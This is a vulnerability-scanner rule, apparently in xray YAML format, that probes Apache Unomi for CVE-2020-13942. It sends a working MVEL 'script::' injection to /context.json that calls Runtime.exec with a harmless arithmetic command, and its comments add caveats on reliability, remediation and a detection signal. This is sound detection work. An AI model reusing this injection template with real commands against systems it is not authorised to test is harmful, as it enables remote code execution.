unomi-rce-cve-2020-13942.yml
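# Scanner rule for CVE-2020-13942 (Apache Unomi remote code execution).
# It sends one POST to /context.json carrying a profilePropertyCondition
# whose parameter value starts with "script::", then checks what comes back.
#
# Reviewer notes for anyone relying on this rule:
# - The match expression only proves that the endpoint answered 200 and
#   echoed the random filter id and session id. The output of the
#   `expr {{f1}}+{{f2}}` command is never inspected, so a hit shows a
#   reachable /context.json endpoint rather than confirmed execution.
#   Treat hits as "needs verification"; a patched instance may also match.
# - Remediation: upgrade Apache Unomi to a release that fixes
#   CVE-2020-13942 and keep /context.json off untrusted networks.
# - Detection: request bodies sent to /context.json that contain "script::"
#   inside "parameterValues" are a useful log/WAF signal.
name: poc-yaml-unomi-rce-cve-2020-13942
transport: http
# Fresh random values per run so responses cannot be matched by accident.
set:
  # f1/f2 are interpolated into the request body only; the match
  # expression below does not reference them.
  f1: randomInt(800000000, 900000000)
  f2: randomInt(800000000, 900000000)
  # id and session are the markers the match expression looks for.
  id: randomLowercase(20)
  session: randomLowercase(20)
rules:
  r1:
    request:
      method: POST
      path: "/context.json"
      headers:
        Content-Type: application/json
      # Literal block scalar: the JSON is sent as written after the
      # {{...}} placeholders are substituted from `set`.
      body: |-
        {
            "filters": [
                {
                    "id": "{{id}}",
                    "filters": [
                        {
                            "condition": {
                                "parameterValues": {
                                    "": "script::Runtime r = Runtime.getRuntime(); r.exec(\"expr {{f1}}+{{f2}}\");"
                                },
                                "type": "profilePropertyCondition"
                            }
                        }
                    ]
                }
            ],
            "sessionId": "{{session}}"
        }
    # Reflection check only: status 200 plus both random markers in the body.
    expression: response.status == 200 && response.body.bcontains(bytes(string(id))) && response.body.bcontains(bytes(string(session)))
# The rule set reports a finding when r1 matches.
expression: r1()
detail:
  author: 曦shen
  links:
    - https://github.com/vulhub/vulhub/blob/master/unomi/CVE-2020-13942/README.zh-cn.md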